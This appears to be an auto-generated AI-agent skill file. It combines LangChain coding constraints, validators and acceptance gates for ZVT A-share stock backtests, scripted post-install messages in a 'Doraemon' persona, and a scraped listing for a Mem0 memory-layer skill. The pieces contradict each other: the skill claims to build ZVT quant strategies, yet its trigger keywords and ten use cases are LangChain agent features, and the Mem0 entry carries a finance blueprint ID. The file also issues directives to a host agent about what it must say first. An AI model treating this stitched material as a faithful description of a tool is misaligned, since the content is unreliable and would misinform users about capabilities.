    action: Decide retry granularity FIRST. (a) Whole-sequence retry (re-prompt + re-call llm + re-parse on any failure) —
      apply .with_retry() once at the end of the pipe. (b) Per-step retry (only retry the LLM on transient errors, not the
      parser) — call .with_retry() on the specific step Runnable before composing. Mixing strategies in your head while writing
      pipe expressions yields whichever boundary the parens fall on; be explicit. Same boundary rules apply to .with_fallbacks()
      (sequence-level vs step-level fallback).
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-022
    when: When auditing agent-related imports for deprecation status, or designing a static-analysis lint for langchain v1
      migration
    action: (a) Treat any import of AgentAction or AgentFinish as latent tech debt — they're stable today but on the soft-deprecation
      track. (b) Detection cannot be decorator-based for these symbols; use import-path matching (`from langchain_core.agents
      import AgentAction`) and flag with severity 'will-deprecate-soon'. (c) The replacement direction is the v1 langchain.agents.create_agent
      surface (CompiledStateGraph state, not AgentAction tuples). New agent code should not produce AgentAction objects.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: langchain-C-023
    when: When citing example notebooks, writing migration guides, or extracting use-cases from langchain in code or docs
    action: (a) Citations point to docs.langchain.com or the langchain-ai/docs repo, NOT this monorepo's cookbook/ path. (b)
      Use-case extraction (SOP step 2d-equivalent) cannot rely on local cookbook/ examples — pull from the docs repo separately.
      (c) For tutorials referencing cookbook paths, refresh the URLs to the new docs site or remove if obsolete. (d) The /docs/
      directory at the repo root is also relocated — same treatment.
    severity: low
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: langchain-C-024
    when: When editing AGENTS.md or CLAUDE.md at the langchain repo root
    action: '(a) Always edit both files together. (b) Verify byte-equality after edit: `diff AGENTS.md CLAUDE.md` should return
      empty. (c) Treat them as a single source of truth surfaced under two filenames for tool-discovery reasons. (d) For automated
      tooling (CI lint), add a check that diffs the two files and fails the PR on divergence.'
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-025
    when: When opening a PR against the langchain monorepo
    action: '(a) Title format: `<type>(<scope>): <description>`. Allowed scopes are listed in .github/workflows/pr_lint.yml
      — common: langchain, core, openai, anthropic, ollama, etc. (b) `feat`, `fix`, `docs`, `refactor`, `test`, `chore` are
      the conventional types. (c) Match the scope to the package directory you''re touching (`libs/langchain_v1/` → `langchain`,
      `libs/core/` → `core`, `libs/partners/openai/` → `openai`). (d) Same scope rule applies to commit messages within the
      PR — release automation uses Conventional Commits to determine semver bumps and changelog entries.'
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-026
    when: When adding a new parameter to any public method in langchain or langchain_core
    action: (a) Always insert a `*,` separator before new parameters. (b) Provide a default value for the new parameter (additive,
      never required). (c) Never reorder existing positional parameters. (d) Treat function signature as a public API contract
      — review your diff for any non-keyword-only addition before requesting review. (e) For partner-package methods (libs/partners/*),
      the same rule applies — partner releases are coupled.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-027
    when: When adding or updating a GitHub Action reference in .github/workflows/*
    action: '(a) Use the form `uses: actions/checkout@<40-char-sha>` not `@v4` or `@main`. (b) Include a comment with the
      human-readable version next to the SHA: `# v4.1.7`. (c) Use a tool like dependabot or renovate configured for SHA pinning
      to keep them updated. (d) Do not partially apply this rule — every action in every workflow must be SHA-pinned, including
      local composite actions and reusable workflows.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-028
    when: When writing or modifying any Python function in libs/* of the langchain monorepo
    action: '(a) Type signature on the function definition: `def foo(x: int, y: str = ''default'') -> dict[str, Any]:`. (b)
      Docstring uses Google style: ''Args:'', ''Returns:'', ''Raises:'' sections; do NOT repeat type info in the docstring.
      (c) Avoid Sphinx ``backtick`` formatting — use plain text or single backticks consistent with Google style. (d) Run
      `mypy` and `ruff` before submitting; lint will catch type-hint omissions.'
    severity: low
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-029
    when: When writing example code, tutorials, or test fixtures in langchain that reference a specific LLM model name
    action: (a) Use the latest GA model name for the relevant provider at the time of writing. (b) For long-lived examples,
      prefer init_chat_model('openai:gpt-4o') style which lets users override via env. (c) Do not pin to dated snapshot model
      IDs (e.g., gpt-4-0613) unless the example explicitly demonstrates a snapshot-specific behavior. (d) When PR-reviewing,
      scan example/docstring code for retired model names and request updates.
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-030
    when: When using BaseChatModel for any task that needs multiple candidate completions (sampling, beam search, n-best)
    action: '(a) For single-completion the default invoke path is correct. (b) For n-best / sampling: do NOT call .invoke()
      and pass n=N hoping to get a list back — invoke unwraps generations[0] always. Instead, call `model._generate(messages,
      n=N, ...)` directly to get a ChatResult with multiple ChatGeneration entries. (c) Document this behavior in any wrapper
      API you build — many users assume invoke returns ''the model output'' generally.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-031
    when: When parsing message content from a BaseChatModel response, especially across providers with different multimodal
      capability profiles
    action: '(a) Inspect message.content type before access: `if isinstance(content, str): ... elif isinstance(content, list):
      for block in content: ...`. (b) Use the helper `convert_to_messages` / `convert_to_openai_messages` from langchain_core.messages
      to normalize across shapes. (c) For multimodal apps, target content blocks explicitly and document the assumed provider
      capability. (d) For text-only apps, use the AIMessage.text accessor (now via the TextAccessor shim at messages/base.py:82,
      with warn_deprecated for the legacy direct-string path).'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-032
    when: When debugging tool-call semantics in a v1 create_agent based system, or when designing tool-error-handling policies
    action: '(a) For tool errors, partial outputs, parallel calls, and tool-result formatting: read langgraph.prebuilt.ToolNode
      source, NOT langchain tool docs. (b) Configure error handling via ToolNode''s handle_tool_errors parameter (passed through
      create_agent or directly when constructing). (c) For custom tool dispatch (e.g., conditional tool selection based on
      state), build directly on langgraph StateGraph rather than expecting langchain to expose dispatch hooks. (d) Pin the
      langgraph version explicitly — tool semantics can change across langgraph minor releases independent of langchain.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-033
    when: When building a RAG pipeline where doc freshness matters (e.g., regulatory filings, news, time-sensitive support
      docs)
    action: '(a) Store a timestamp in every Document.metadata (e.g., ''created_at'', ''effective_date''). (b) Add a post-retrieval
      filter: `retriever | RunnableLambda(lambda docs: [d for d in docs if d.metadata[''effective_date''] >= cutoff])`. (c)
      For agent use: include the cutoff date in the agent''s system message and rely on the LLM to filter — but verify with
      a test that stale docs are actually rejected. (d) Document the freshness policy in your RAG application''s own contract.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-034
    when: When switching the chat-model provider, or designing multi-provider failover (e.g., model_fallback middleware UC-005)
    action: '(a) Set each partner''s auth env var explicitly; do NOT assume one env covers all. (b) Verify each partner''s
      chat_models.py for `_astream` (native streaming), `bind_tools` (tool calling), `with_structured_output` (structured
      output) overrides — coverage varies. Use init_chat_model for the LLM but accept that downstream features may differ.
      (c) For retrieval, switching the embedder implies re-indexing — different families produce vectors at different cosine
      geometries; stored vectors are not portable. (d) For multi-provider fallback: use Runnable.with_fallbacks at the chain
      level OR the model_fallback middleware (UC-005) at the agent level — pick consciously.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-035
    when: When building a chain or agent that calls .bind_tools() or .with_structured_output() on a chat model whose provider
      you don't control
    action: '(a) For partner packages you don''t own: read the partner source for an `def bind_tools(...)` override before
      relying on it. If absent, the call raises NotImplementedError at first .invoke()-with-tools attempt. (b) For with_structured_output:
      if your provider lacks bind_tools override, with_structured_output will refuse at l. 2388 with a guard message; it''s
      not a silent miss but it surfaces deep. (c) For multi-provider apps with optional tool calling, gate the tools-bound
      code path: `if hasattr(model, ''bind_tools'') and callable(...)` is NOT enough — every BaseChatModel has bind_tools
      as an inherited method; check `type(model).bind_tools is not BaseChatModel.bind_tools`.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: langchain-C-036
    when: When subclassing or modifying RunnableSequence (rare but possible for advanced use cases — e.g., custom telemetry-injecting
      sequence wrapper)
    action: '(a) Preserve the native overrides at lines 3175 (invoke), 3251 (ainvoke), 3379 (batch), 3558 (stream), 3572 (astream)
      when subclassing. (b) If you need to inject behavior (logging, telemetry, error handling), wrap each step or use middleware
      patterns rather than overriding the sequence-level methods to call super(). (c) When refactoring core: any change that
      removes a native override falls back to the executor-wrap default and silently degrades chain perf for every LCEL user.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-037
    when: When composing complex LCEL chains where readers (or your future self) need to introspect the chain structure
    action: '(a) Trivial chains (`prompt | llm | parser`): use `|` for readability. (b) Complex chains with dict fan-out:
      prefer explicit `RunnableParallel({''x'': ..., ''y'': ...})` over inline dict literal — readers immediately see the
      parallel branch. (c) Callable steps that need stable identity: wrap with `RunnableLambda(my_func)` explicitly so traces
      show the function name, not a generated lambda repr. (d) For library code consumed by others: use explicit RunnableSequence(*steps)
      constructor and explicit type annotations on inputs/outputs.'
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-038
    when: When designing a callback handler or wiring callbacks into a chain that may be invoked through both .invoke() and
      .ainvoke() paths
    action: '(a) Pick handler type based on the chain''s invocation path: .ainvoke()/.astream() → AsyncCallbackHandler; .invoke()/.stream()
      → BaseCallbackHandler. (b) For chains called both ways, implement BOTH a sync and async handler that share state (or
      use a thread-safe shared state object). (c) When the callback shim is unavoidable, document the run_id parent semantics
      — the shim creates a new run context that may surprise downstream tracing. (d) Avoid relying on callback ordering across
      the sync/async boundary; treat it as eventually-consistent.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: langchain-C-039
    when: When migrating an existing langchain_classic.agents.AgentExecutor based system to v1 langchain.agents.create_agent
    action: '(a) Audit every consumer of agent_executor.stream() / .invoke()[''intermediate_steps''] / callbacks: each must
      be rewritten for the v1 CompiledStateGraph API surface. (b) Replace AgentExecutor''s tool-error handling parameters
      with the equivalent in langgraph ToolNode configuration (passed through create_agent). (c) Test with .invoke() AND .stream()
      — behavior diverges most visibly in streaming mode. (d) Plan migration as a coordinated rewrite, not a one-line `from
      langchain.agents import create_agent` swap.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-040
    when: When packaging or deploying a langchain v1 application that uses init_chat_model
    action: '(a) For every provider you might use, list the partner explicitly: `langchain-openai`, `langchain-anthropic`,
      `langchain-ollama`, etc. in install_requires / pyproject.toml. (b) If your app supports runtime provider selection,
      install ALL the partner packages it could resolve to (or build a lazy-init wrapper that surfaces a clean error before
      reaching init_chat_model). (c) For development: check that your import-time test suite covers init_chat_model with each
      provider you intend to ship — catches missing-partner ImportErrors before deploy.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-041
    when: When constructing a custom prompt template subclass or composing a chain with mixed prompt types
    action: (a) For chat models, use ChatPromptTemplate (.format_messages → list[BaseMessage]). (b) For LLM models, use PromptTemplate
      (.format → str). (c) Pipe steps after the prompt must accept the prompt's output type — chat prompt + string-only parser
      is a type mismatch. (d) Use PromptValue (the union returned by format_prompt) when you need to defer the str-vs-message
      decision to the downstream consumer.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-042
    when: When parsing AIMessage / AIMessageChunk output from a tool-calling chat model
    action: '(a) After every tool-calling .invoke(): check both `message.tool_calls` (list[ToolCall]) AND `message.invalid_tool_calls`
      (list[InvalidToolCall]). (b) For invalid_tool_calls: log the error, decide whether to retry (with a corrective system
      message) or fall back (call without tools). (c) For agent loops, the agent factory typically re-prompts on invalid_tool_calls
      automatically — verify this by reading the factory source if you''re not using create_agent v1. (d) Do not assume 0
      tool_calls means ''model decided not to use tools'' — could be all calls landed in invalid_tool_calls.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: langchain-C-043
    when: When writing a text-LLM provider by subclassing BaseLLM / BaseLanguageModel directly (rare; most provider subclass
      BaseChatModel for chat)
    action: (a) Implement BOTH generate_prompt and agenerate_prompt — there is no defaulted fallback. (b) For new providers,
      prefer subclassing BaseChatModel (single _generate abstract) over BaseLanguageModel (two abstract paths) unless you
      specifically need text-completion semantics. (c) For text-completion models that don't have a true async API, you may
      implement agenerate_prompt as `await run_in_executor(None, self.generate_prompt, ...)` explicitly — make the executor
      wrap deliberate, not accidental.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-044
    when: When sharing Runnable instances across threads / coroutines, especially with configurable_fields or with_config
      overrides
    action: '(a) Treat the original Runnable as immutable — composition methods return new instances; share the original safely.
      (b) When using configurable_fields, scope the .with_config(configurable={''k'': v}) call to the unit-of-work boundary;
      do NOT mutate config dicts after passing them in. (c) For per-request overrides in async servers: pass config to .invoke()/.ainvoke()
      rather than mutating a shared wrapper. (d) DynamicRunnable subclasses (custom configurable runnables) must implement
      _prepare with thread-safe access to config state.'
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: langchain-C-045
    when: When extracting use-cases, examples, or tutorials from the langchain repository for documentation, SOP processes,
      or AI-knowledge harvesting
    action: '(a) For use-case examples: clone langchain-ai/docs separately or pull from https://docs.langchain.com. (b) Do
      NOT use the in-repo cookbook/ path — it''s gone. (c) For SOP processes (e.g., Doramagic blueprint extraction step 2d):
      explicitly account for the docs-vs-code split in the input list; the AI infrastructure project no longer self-documents
      inside the source monorepo.'
    severity: low
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-046
    when: When designing new agent code, or when an upgrade plan needs to identify upcoming-deprecation surfaces
    action: '(a) New agent code: target langchain.agents.create_agent v1 → CompiledStateGraph (LangGraph state, no AgentAction
      tuple). (b) Existing code constructing AgentAction/AgentFinish: schedule rewrite as part of v1 migration plan even though
      the symbols are not @deprecated today. (c) Lint rules detecting deprecation should flag any import of AgentAction/AgentFinish
      as ''will-deprecate'' tier even though @deprecated is absent today.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-047
    when: When opening a PR that touches AGENTS.md or CLAUDE.md at the langchain repo root
    action: '(a) Always edit both files together in a single commit. (b) Add a CI check (e.g., in pr_lint.yml) that runs `diff
      AGENTS.md CLAUDE.md` and fails the PR on any divergence. (c) Treat the dual files as one source-of-truth surfaced under
      two filenames for tool-discovery; do not fork them. (d) Reviewer rule: any PR touching one file but not the other should
      be requested-changes.'
    severity: low
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-048
    when: When implementing a new BaseStore-style key-value backend (e.g., for caching, doc-store, vector-id mapping)
    action: 'Implement all 4 @abstractmethods: mget(keys: Sequence[K]) -> list[V | None]; mset(key_value_pairs: Sequence[tuple[K,
      V]]) -> None; mdelete(keys: Sequence[K]) -> None; yield_keys(*, prefix: str | None = None) -> Iterator[K]. The ''m''
      prefix means multi-key — pass lists, not single keys, for batch performance. Generic K, V allow typed stores (e.g.,
      BaseStore[str, bytes] for byte stores).'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-049
    when: When implementing a new RecordManager backend for vector-store indexing/deduplication
    action: 'Subclass RecordManager and implement all 12 @abstractmethods (per indexing/base.py). The contract covers: schema
      initialization (create_schema/get_time), keypair upsert (update), key existence (exists), key listing (list_keys), key
      deletion (delete_keys), and the async variants. Reference SQLRecordManager source for a complete implementation pattern.
      For new backends, prefer extending an existing reference implementation over starting from scratch — the abstract surface
      is wider than it looks.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-050
    when: When implementing a new VectorStore backend for langchain
    action: (a) Implement add_texts(texts, metadatas, **kwargs) -> list[str] (returns list of inserted IDs). (b) Implement
      similarity_search(query, k, **kwargs) -> list[Document]. (c) Also override the from_texts / from_documents class methods
      if you want users to bootstrap your store from a doc list — these are NOT abstract but are conventional API. (d) For
      async, override aadd_texts and asimilarity_search natively to avoid run_in_executor tax in async RAG pipelines.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: langchain-C-051
    when: When implementing a new Embeddings provider, especially for asymmetric embedder models
    action: '(a) Implement embed_documents(texts: list[str]) -> list[list[float]] for batch document embedding (use the provider''s
      batch endpoint where available). (b) Implement embed_query(text: str) -> list[float] for single-query embedding (use
      the provider''s query-side endpoint if asymmetric). (c) For async, override aembed_documents / aembed_query natively.
      (d) Document the embedder family geometry — caller code switching embedders must re-index because cosine geometry differs.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
    name: 'finance-bp-132 / '
    version: v6.1
    intent_keywords:
    - tool-calling agent
    - ReAct agent
    - create_agent
    - LangGraph agent
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: no candidate field had 2-7 distinct values; all capabilities collapsed into single group
      groups:
      - group_id: all
        name: All Capabilities
        description: ''
        emoji: 📦
        uc_count: 10
        ucs:
        - uc_id: UC-001
          name: UC-001
          short_description: UC-001
          sample_triggers:
          - tool-calling agent
          - ReAct agent
          - create_agent
        - uc_id: UC-002
          name: UC-002
          short_description: UC-002
          sample_triggers:
          - structured output
          - JSON mode
          - response_format
        - uc_id: UC-003
          name: UC-003
          short_description: UC-003
          sample_triggers:
          - human in the loop
          - HITL interrupt
          - pause and resume
        - uc_id: UC-004
          name: UC-004
          short_description: UC-004
          sample_triggers:
          - tool call limit
          - model call limit
          - cost guardrails
        - uc_id: UC-005
          name: UC-005
          short_description: UC-005
          sample_triggers:
          - model fallback
          - provider failover
          - rate limit handling
        - uc_id: UC-006
          name: UC-006
          short_description: UC-006
          sample_triggers:
          - PII redaction
          - prompt scrubbing
          - compliance middleware
        - uc_id: UC-007
          name: UC-007
          short_description: UC-007
          sample_triggers:
          - conversation summarization
          - context window management
          - memory compression
        - uc_id: UC-008
          name: UC-008
          short_description: UC-008
          sample_triggers:
          - todo tracking
          - agent planning
          - plan and track
        - uc_id: UC-009
          name: UC-009
          short_description: UC-009
          sample_triggers:
          - RAG pipeline
          - retriever
          - LCEL chain
        - uc_id: UC-010
          name: UC-010
          short_description: UC-010
          sample_triggers:
          - streaming output
          - astream
          - SSE streaming
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-001
      beginner_prompt: Try uc-001
      auto_selected: true
    - uc_id: UC-002
      beginner_prompt: Try uc-002
      auto_selected: true
    - uc_id: UC-003
      beginner_prompt: Try uc-003
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 10 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
    - Institutional fund holdings tracker via joinquant_fund_runner pattern
    - Custom Transformer + Accumulator factor with per-entity rolling state
    - Bollinger Band mean-reversion factor with BollTransformer (window=20, window_dev=2)
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Mem0 Memory Layer

Skill

Mem0 长期记忆层：为 LLM agent / chatbot 提供事实级记忆——抽取、嵌入、去重、存储 + 混合检索（语义 + BM25 + 实体加权），覆盖 17 个核心用例。自托管 Memory 与托管 MemoryClient 双形态。 Mem0 long-term memory layer for L...

---
name: mem0-memory-layer
description: |-
  Mem0 长期记忆层：为 LLM agent / chatbot 提供事实级记忆——抽取、嵌入、去重、存储 + 混合检索（语义 + BM25 + 实体加权），覆盖 17 个核心用例。自托管 Memory 与托管 MemoryClient 双形态。
  Mem0 long-term memory layer for LLM agents and chatbots: extract, embed, dedup, store, and hybrid-retrieve (semantic + BM25 + entity boost). Ships both self-hosted Memory and hosted MemoryClient.
license: MIT-0
compatibility: AI engineering knowledge skill — host AI consumes seed.yaml directly. No installation required.
metadata:
  version: "v0.1.0"
  blueprint_id: "finance-bp-131"
  blueprint_source: "mem0ai/mem0"
  blueprint_commit: "693e709389526b45cfadfd06d89a0e13af7c7345"
  category: ai-engineering
  doramagic_url: "https://doramagic.ai/zh/crystal/mem0-memory-layer"
  openclaw:
    skillKey: mem0-memory-layer
    category: ai-engineering
    primaryEnv: knowledge
---
# 这个 skill 适合什么用户？能做哪些任务？

## 概览

Mem0 是一个 Python 长期记忆框架（github.com/mem0ai/mem0），为 LLM 应用和 agent 提供个性化记忆层。自托管 Memory 类内置 V3 阶段化抽取-存储流水线（Phase 0 上下文采集 → Phase 8 消息持久化），可插拔 vector store / embedding / LLM / reranker provider。混合检索结合语义相似度 + 可选 BM25 / 后端原生 FTS 关键词搜索 + 实体加权评分。

另有独立托管 SaaS 路径 MemoryClient（api.mem0.ai）共享公开 API，但抽取下沉到平台。OSS...

**Doramagic 晶体页**: https://doramagic.ai/zh/crystal/mem0-memory-layer

## 知识规模

- **52 条约束** (1 fatal + 51 non-fatal)
- 上游源码: `mem0ai/mem0` @ commit `693e7093`
- 蓝图 ID: `finance-bp-131`

## 用法

Host AI（Claude Code / Cursor / OpenClaw）读 `references/seed.yaml`，按其中的：
- `intent_router` 匹配用户意图
- `architecture` 理解项目架构
- `constraints` 应用 anti-pattern 约束
- `business_decisions` 参考核心设计决策

## FAQ 摘要

### 这个 skill 适合什么用户？能做哪些任务？
适合需要给 LLM agent / chatbot 加长期记忆的工程师：用户偏好持久化、多轮会话上下文延续、跨 session 事实复用。覆盖 17 个用例（个性化助手、客服、教育等）。访问 doramagic.ai/r/mem0 查看完整目录。

### 需要准备什么环境？依赖什么？
